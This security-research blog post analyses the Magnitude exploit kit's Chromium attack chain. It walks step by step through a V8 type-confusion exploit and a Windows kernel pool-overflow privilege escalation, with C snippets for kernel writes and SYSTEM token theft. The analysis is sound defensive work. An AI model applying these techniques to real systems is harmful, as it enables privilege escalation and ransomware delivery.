
Exploit Kits vs. Google Chrome

12 January 2022 at 16:37

In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.

#MagnitudeEK is now stepping up its game by using CVE-2021-21224 and CVE-2021-31956 to exploit Chromium-based browsers. This is an interesting development since most exploit kits are currently targeting exclusively Internet Explorer, with Chromium staying out of their reach.

— Avast Threat Labs (@AvastThreatLabs) October 19, 2021

About a month later, we found that the Underminer exploit kit followed suit and developed an exploit for the same Chromium vulnerability. That meant there were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020, and CVE-2020-1054.

We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but as far as we can tell, none did. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still uses these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts target Chromium-based browsers.

This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts on why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.

Exploit Kit Theory

To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.

Modus operandi of a typical browser exploit kit

The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually dwindle to almost nothing.

So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.

  • Prevalence of the vulnerability
    The more users are affected by the vulnerability, the more attractive it is to the attackers. 
  • Exploit reliability
    Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
  • Difficulty of exploit development
    This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
  • Targeting precision
    The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
  • Expected vulnerability lifetime
    As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective the patching process of the affected software is.
  • Exploit detectability
    The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect. 
  • Exploit potential
    Some exploits give the attackers SYSTEM-level code execution, while others only land them inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with additional LPE exploits, or they place limits on what the final malicious payload is able to do.

Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.

A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often rely heavily on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and more costly to maintain.

Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.

It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.

CVE-2021-21224

Let’s now take a closer look at Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on GitHub on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.

It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…

Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply to V8 exploitation in general and so are used in the later stages of Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.

The core of the exploit, triggering the vulnerability to corrupt the length of vuln_array

The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length). 

A demonstration of how an overwrite on vuln_array can corrupt the length of oob_array

Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now also possible to read and write past its end.

The addrof and fakeobj exploit primitives

Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution. 

A step-by-step breakdown of the addrof primitive. Note that just the lower 32 bits of the address get leaked, while %DebugPrint returns the whole 64-bit address. In practice, this doesn’t matter because V8 compresses pointers by keeping upper 32 bits of all heap pointers constant.

Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that  vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.

The arbitrary read/write exploit primitives

With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.

Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.

The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.

A dummy WebAssembly program that will get hollowed out and replaced by Magnitude’s shellcode

The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.

Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.

There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.

CVE-2021-31956

Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a two-part blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.

The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.
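
For context, the buffers passed to NtSetEaFile and returned by NtQueryEaFile are chains of the following structure (documented in ntifs.h; the comments tying it to the bug are ours). Each entry is aligned to a 4-byte boundary, and it is this alignment padding, computed right at the end of the allocated pool chunk, that the vulnerable length calculation mishandles.

#include <windows.h>

// Extended Attribute entry layout, as documented in ntifs.h. Entries are
// chained via NextEntryOffset and each entry is aligned to a 4-byte
// boundary; the padding needed for that alignment is what
// NtfsQueryEaUserEaList miscalculates when it falls exactly at the end of
// the allocated pool chunk, producing the integer underflow described above.
typedef struct _FILE_FULL_EA_INFORMATION {
    ULONG  NextEntryOffset;  // offset to the next entry, 0 for the last one
    UCHAR  Flags;
    UCHAR  EaNameLength;     // length of EaName, excluding the terminating NUL
    USHORT EaValueLength;    // length of the value bytes that follow the name
    CHAR   EaName[1];        // ANSI name, immediately followed by the value bytes
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;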

The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.

Check for the victim’s Windows build number

Next, the exploit brute-forces file handles until it finds one on which it can use the NtSetEaFile syscall to set NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later, when NtQueryEaFile gets called.

Specially crafted NTFS Extended Attributes, designed to cause a paged pool buffer overflow

When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10,000 extra _WNF_STATE_DATA structures in a row and frees every other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size.

With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them, querying the ChangeStamp of each using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.

The corrupted _WNF_STATE_DATA instance. AllocatedSize and DataSize were both artificially increased, while ChangeStamp got set to an easily recognizable value.

After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.

The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.

The exploit scans the overread memory, looking for a _WNF_NAME_INSTANCE header. 0x0903 here represents the NodeTypeCode, while 0xA8 is a preselected NodeByteSize.

What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.

Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.
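
Those constraints follow directly from the layout of the _WNF_STATE_DATA header, which (as reconstructed from public research; this is not an official Microsoft definition) takes up 0x10 bytes and is immediately followed by the WnfStateData bytes in memory:

#include <windows.h>

// _WNF_STATE_DATA header, reconstructed from public research and kernel
// symbols. The WnfStateData buffer starts right after this 0x10-byte header,
// which is why the corrupted StateData pointer must point 0x10 bytes before
// the address the exploit wants to read or write.
typedef struct _WNF_NODE_HEADER {
    USHORT NodeTypeCode;     // structure type tag
    USHORT NodeByteSize;
} WNF_NODE_HEADER;

typedef struct _WNF_STATE_DATA {
    WNF_NODE_HEADER Header;
    ULONG AllocatedSize;     // maximum number of bytes writable via NtUpdateWnfStateData
    ULONG DataSize;          // number of bytes readable via NtQueryWnfStateData
    ULONG ChangeStamp;       // bumped on every update; set to 0xcafe by the overflow
} WNF_STATE_DATA;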

The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread. 

With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to KernelMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.

The exploit corrupting _KTHREAD.PreviousMode
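
To illustrate what the corrupted PreviousMode buys the attackers, here is a minimal, hedged sketch of a kernel write built on top of it. This is not Magnitude’s actual code: the exploit invokes the syscalls directly, while the sketch below goes through the ntdll export (link against ntdll.lib or resolve it with GetProcAddress) for readability.

#include <windows.h>
#include <winternl.h>

// Well-known (undocumented) prototype of the ntdll export.
extern "C" NTSTATUS NTAPI NtWriteVirtualMemory(
    HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer,
    SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// Writes 8 bytes to a kernel address in the context of the current process.
// This only succeeds once _KTHREAD.PreviousMode has been set to KernelMode;
// with PreviousMode == UserMode, the kernel rejects kernel-space addresses.
bool KernelWrite64(ULONG_PTR kernelAddress, ULONGLONG value) {
    SIZE_T written = 0;
    NTSTATUS status = NtWriteVirtualMemory(GetCurrentProcess(),
                                           (PVOID)kernelAddress,
                                           &value, sizeof(value), &written);
    return NT_SUCCESS(status) && written == sizeof(value);
}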

As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.

With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.
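
As a rough illustration of that final step (again a hedged sketch rather than Magnitude’s code), the walk over ActiveProcessLinks could look like the following, given 64-bit kernel read/write helpers such as the one sketched above. The offsets are placeholders; the real exploit derives the correct values from the build number.

#include <windows.h>

// Hypothetical per-build offsets into _EPROCESS; the actual values differ
// between the Windows builds the exploit supports.
constexpr ULONG_PTR OFF_UNIQUE_PROCESS_ID    = 0x2E8; // placeholder
constexpr ULONG_PTR OFF_ACTIVE_PROCESS_LINKS = 0x2F0; // placeholder
constexpr ULONG_PTR OFF_TOKEN                = 0x360; // placeholder

// Assumed kernel read/write helpers, e.g. built on the PreviousMode primitive.
ULONGLONG KernelRead64(ULONG_PTR kernelAddress);
bool      KernelWrite64(ULONG_PTR kernelAddress, ULONGLONG value);

void StealSystemToken(ULONG_PTR currentEprocess) {
    // Walk the circular list of processes until we find System (PID 4).
    ULONG_PTR link = (ULONG_PTR)KernelRead64(currentEprocess + OFF_ACTIVE_PROCESS_LINKS);
    for (;;) {
        ULONG_PTR eprocess = link - OFF_ACTIVE_PROCESS_LINKS;
        if (KernelRead64(eprocess + OFF_UNIQUE_PROCESS_ID) == 4) {
            // Copy System's token over ours, masking the low RefCnt bits
            // of the _EX_FAST_REF, as the exploit does.
            ULONGLONG systemToken = KernelRead64(eprocess + OFF_TOKEN) & ~0xFULL;
            KernelWrite64(currentEprocess + OFF_TOKEN, systemToken);
            return;
        }
        link = (ULONG_PTR)KernelRead64(link); // follow LIST_ENTRY.Flink
    }
}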

Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.

Fixups performed on previously corrupted _WNF_NAME_INSTANCE structures

Final Thoughts

If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.

As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.

Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.
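
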